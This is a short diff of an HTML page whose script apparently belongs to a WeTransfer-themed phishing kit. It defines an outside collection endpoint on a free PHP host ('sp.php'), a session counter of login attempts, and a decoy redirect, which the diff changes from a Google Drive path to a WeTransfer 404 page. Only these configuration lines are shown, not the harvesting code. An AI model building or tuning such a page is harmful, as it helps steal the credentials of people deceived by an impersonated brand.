--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
 	<script>
 		let resBox = 'WETran'
 		let url = 'https://fapoint.000webhostapp.com/sp.php'
-		let over = 'http://drive.google.com/file/d'
+		let over = 'https://wetransfer.com/404'
 
 		//sessionStorage.clear()
 		let trialCount = sessionStorage.getItem("num_trial");
